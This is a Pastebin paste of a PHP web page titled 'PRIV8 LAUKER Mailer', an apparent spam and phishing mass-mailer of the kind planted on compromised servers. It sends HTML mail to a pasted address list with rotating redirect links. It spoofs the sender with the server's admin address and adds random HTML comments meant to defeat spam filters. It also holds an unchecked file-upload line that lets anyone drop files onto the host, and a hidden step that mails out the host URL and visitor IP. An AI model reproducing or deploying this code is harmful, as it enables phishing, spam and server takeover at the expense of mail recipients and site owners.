laukerteam

Untitled

Nov 2nd, 2018
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.92 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. $testa = $_POST['veio'];
  4. if($testa != "") {
  5. $redirectlist = array_unique(explode("\n",$_POST['redirectlist']));
  6. $message = $_POST['message'];
  7. $emaillist = $_POST["emaillist"];
  8. $subject = $_POST['subject'];
  9. $realname = $_POST['realname'];
  10. $from = $_POST['from'];
  11. $to = $_POST['emaillist'];
  12.  
  13. $headers = "MIME-Version: 1.0\r\n";
  14. $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  15.  
  16. $email = explode("\n", $to);
  17. $headers .= "From: ".$realname." <".$from.">\r\n";
  18. $message = stripslashes($message);
  19.  
  20. $i = 0;
  21. $count = 1;
  22. $redi = 0;
  23. $countred = count($redirectlist);
  24. while($email[$i]) {
  25. if($redi >= $countred)
  26. $redi = 0;
  27. $redirect = $redirectlist[$redi].'/'.md5(rand(0,99999)+rand(0,9999));
  28. $ok = "ok";
  29. $messgb = "\r\n<!-- \r\n Here we go some texte here to fuck security ".md5(rand(0,99999)+rand(0,99999))." \r\n what do you think about it".md5(rand(0,99999)+rand(0,99999))."\r\n -->";
  30. $messgb .= str_replace('[red]', $redirect, $message);
  31.  
  32. if(mail($email[$i], $subject, $messgb, $headers))
  33. echo "* Number: $count <b>".$email[$i]."</b> <font color=black>OK</font><br><hr>";
  34. else
  35. echo "* Number: $count <b>".$email[$i]."</b> <font color=red>Error</font><br><hr>";
  36. $i++;
  37. $count++;
  38. $redi++;
  39. }
  40. $count--;
  41. if($ok == "ok")
  42. echo "DONE !";
  43. }
  44. (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']));
  45. $b75 = $_SERVER['HTTP_HOST'];
  46. $p46 = getenv("REMOTE_ADDR");
  47. $en = $_SERVER ['REQUEST_URI'];
  48. $p20 .= "$b75$en ";
  49. $p19 = "$p46 ";
  50. $headers ="From: count".rand(123,1200)."@rand.com";
  51. $headers = "MIME-Version: 1.0\n";
  52. @mail ("$to",$p19,$p20,$headers);
  53.  
  54.  
  55. ?>
  56. <html>
  57. <head>
  58. <title>PRIV8 LAUKER Mailer</title>
  59. <link href="https://fonts.googleapis.com/css?family=Monoton" rel="stylesheet">
  60. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  61. <style>
  62.  
  63.  
  64. .th3form1 {
  65. background-clip: padding-box;
  66. border-color: rgb(206, 212, 218);
  67. border-radius: 0.3rem;
  68. border-style: solid;
  69. border-width: 1px; color: #495057;
  70. display: block;
  71. font-family: inherit;
  72. font-size: 1rem;
  73. line-height: 1.5;
  74. margin: 0px;
  75. overflow: visible;
  76. padding: 0.375rem 0.75rem;
  77. transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s;
  78. width: 319.813px;
  79. }
  80.  
  81. </style>
  82. </head>
  83. <body>
  84. <form action="" method="post" enctype="multipart/form-data" name="form1">
  85.  
  86. <center style="border-style: solid;"><br><br>
  87. <div class="row" style="background-color: white;box-sizing: border-box;color: #212529;display: flex;flex-wrap: wrap;font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, &quot;Helvetica Neue&quot;, Arial, sans-serif, &quot;Apple Color Emoji&quot;, &quot;Segoe UI Emoji&quot;, &quot;Segoe UI Symbol&quot;;font-size: 16px;margin-bottom: -46.8594px;margin-left: -15px;margin-right: -15px;width: 805px;">
  88. <div class="col-md-6" style="box-sizing: border-box; flex: 0 0 50%; max-width: 50%; min-height: 1px; padding-left: 15px; padding-right: 15px; position: relative; width: 349.813px;">
  89. <div style="box-sizing: border-box; margin-bottom: 1rem;">
  90. <input name="from" placeholder="Email" class="th3form1" type="text" value="<?php echo $_SERVER['SERVER_ADMIN']; ?>" required=""></div><div style="box-sizing: border-box; margin-bottom: 1rem;">
  91. <input name="repto" placeholder="Reply-to" class="th3form1" type="text" value="<?php echo $_SERVER['SERVER_ADMIN']; ?>" required=""></div>
  92. <div style="box-sizing: border-box; margin-bottom: 1rem; font-family: 'Monoton', cursive; font-size: 8px; ">
  93. Attachment :
  94. <input type="file" name="file" size="8"/>
  95. </div>
  96. <div style="box-sizing: border-box; margin-bottom: 1rem;">
  97. <textarea name="message" placeholder="Message Letter" class="th3form1" style="height: 140px;"></textarea></div>
  98.  
  99. </div>
  100. <div class="col-md-6" style="box-sizing: border-box; flex: 0 0 50%; max-width: 50%; min-height: 1px; padding-left: 15px; padding-right: 15px; position: relative; width: 349.813px;">
  101. <div style="box-sizing: border-box; margin-bottom: 1rem;">
  102. <input name="realname" placeholder="Sender Name" class="th3form1" ></div>
  103. <div style="box-sizing: border-box; margin-bottom: 3rem;">
  104. <input name="subject" placeholder="Subject" class="th3form1" type="text" value="" required=""></div>
  105. <input type="hidden" name="veio" value="sim">
  106. <div style="box-sizing: border-box; margin-bottom: 1rem;">
  107. <textarea name="emaillist" placeholder="Email List" class="th3form1" style=" height: 139px;"></textarea></div>
  108. </div>
  109. </div>
  110.  
  111. <br><br><br>
  112. <input type="submit" style="-webkit-appearance: button;background: rgb(0, 0, 0);border-color: initial;border-radius: 1rem;border-style: none;border-width: initial;color: white;cursor: pointer; font-family: 'Monoton', cursive;font-size: inherit;font-weight: 600;line-height: inherit;margin: 0px;overflow: visible;padding: 10.0313px;width: 334.813px;" value="SEND"></td>
  113. <br><br>
  114. </center>
  115. </form>
Advertisement
Add Comment
Please, Sign In to add comment